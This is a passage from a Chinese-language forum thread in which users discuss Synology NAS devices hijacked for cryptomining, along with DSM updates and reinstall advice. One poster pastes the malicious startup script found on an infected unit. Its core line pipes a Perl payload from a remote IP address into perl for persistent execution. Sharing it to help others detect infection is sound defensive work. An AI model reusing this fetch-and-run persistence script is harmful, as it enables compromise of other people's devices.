• 7

大家注意下自己的群暉NAS有沒有被侵入(駭客居然用群暉那些arm處理器挖礦……)(轉)

Dear yfcho,

> 無惡意, 但覺得這點建議有點不切實際. 像是為了喝牛奶養了一頭牛的感覺

我想,這只是不同態度的人,對於問題,有不同的處理方式。

有的人向廠商反應,有的人自己動手來,這也只是一種面對問題的選擇。

因為我在創業中,遇到問題,就是一個機會,自然選擇行動,好把握機會。就像是 DD-WRT for my TP-Link TL-WR842ND的事件紀錄一樣。

因此,我認為願意採取比較繁瑣行動面對問題的人,也很值得鼓勵,而過程的點點滴滴,就是他們最大的收穫與成長來源。

國外也有針對 QTS 去重新編譯核心支援 IPtable,也有人修改 Android Device 執行與 WebOS 韌體,執行其他作業系統。

這些都是選擇,而您選擇以一種角度給予行為評價,也是一種選擇。

各位的價值來自自己反省後的定義,可以選擇不受旁人影響,判斷自己的行為是否有價值。

你認為你的成果有價值就是有價值,不需要旁人的錦上添花,你的價值由您來決定!


Best regards,

Amigo
我的部落格:http://amigotechnotes.wordpress.com
似乎直接到控制台-系統更新,去更新DSM到 最新的 版本: 4.3-3827 即可。不必如 http://www.synology.com/zh-tw/support/faq/348 所述重新安裝DSM。

不過剛更新時,CPU耗用還是幾乎接近 100%,後來才慢慢降下來。
群暉補漏洞更新算很快吧!我才看到這 news 就已經更新完畢了。要致意一下。
截至目前為止…
ds209+ii還是無法更新,
控制台內有出現新版的dsm4.2-3246可以下載,
但無法更新,無法連線,
直接到原廠想手動更新的話,
很抱歉,
沒有新的dsm可以下載……不知怎麼了!?
有空來逛逛喔~~~ http://tontonwang.synology.me
Dear uglycat,

> 似乎直接到控制台-系統更新,去更新DSM到 最新的
> 版本: 4.3-3827 即可。

國外論壇有反應,有的會覆蓋更新程式,只會顯示已經是最新版本,必須手動更新。

> 群暉補漏洞更新算很快吧!我才看到這 news 就已經更新完畢了。要致意一下。

以崁入式系統廠商算快!

Best regards,

Amigo
我的部落格:http://amigotechnotes.wordpress.com

sy0215 wrote:
截至目前為止…ds2...(恕刪)


3246這邊有:

http://ukdl.synology.com/download/DSM/4.2/3246/
已中標
機器 DS-409+ 、DS-209+II

今日登入 WEB頁面 PORT 5000
出現 internal server error 畫面

重新啟動NAS ,原本分享資料匣皆不能使用
NAS 名稱被改為 Diskstation

幸好透過 Synology Assistant
重新安裝 DSM 已恢復正常

目前已發現不明資料匣 startup
底下不明檔案 S22DiskStation
內容為
#!/bin/sh
#
#
# Stop myself if running
PIDFILE=/var/run/DiskStation.pid
#
start() {
nohup /usr/syno/bin/curl http://83.170.113.14:8080/browser/start.pl | perl -- &
# write pidfile
echo $! > $PIDFILE
echo "Optware startup myscript"
}
#
stop() {
[ -f ${PIDFILE} ] && kill -9 0
# remove pidfile
rm -f $PIDFILE
echo "Optware shutdown myscript"
}
#
case "$1" in
start)
start
;;
stop)
stop
;;
restart)
stop
sleep 1
start
;;
*)
echo "Usage: $0 (start|stop|restart)"
exit 1
;;
esac
# End

看來 http://83.170.113.14 是另一個被入侵的?

justyuyu wrote:
已中標機器 DS-4...(恕刪)

請問是打什麼指令才查的到
謝謝!
你好~
我這不是打指令的
是中標之後
在系統內找到的檔案
將此不明檔案用記事本打開
裡面所呈現的文字

還沒升級就快去升級

如果NAS平時 5000 PORT 沒有聯外
那應該是不會中獎的...
我有改開其他PORT
但是想要看看有沒有中標
不怕一萬只怕萬一
Dear uglycat,

> 似乎直接到控制台-系統更新,去更新DSM到 最新的 版本: 4.3-3827 即可。
> 不必如 http://www.synology.com/zh-tw/support/faq/348 所述重新安裝DSM。

我找到國外論壇的討論如下:

"...From the email, I understood that if you have DSM 4.2 they recommend to REINSTALL build 3243. That is a different procedure than an update. Actually as I read from other users if DSM update is not showing available updates, given they actually exist, is a symptom that you may be infected. You can do some checks that helped me with SSH access, it's not difficult I did them myself and I'm not really experienced user...check this post: http://forum.synology.com/enu/viewtopic.php?f=19&t=80857..."

來源:Synology Forum: Re: How be 100% sure that I am not infected? Postby kpo » Tue Feb 18, 2014 8:26 pm

Wish it is enough to proof!

Best regards,

Amigo
我的部落格:http://amigotechnotes.wordpress.com
  • 7
內文搜尋
X
評分
評分
複製連結
請輸入您要前往的頁數(1 ~ 7)
Mobile01提醒您
您目前瀏覽的是行動版網頁
是否切換到電腦版網頁呢?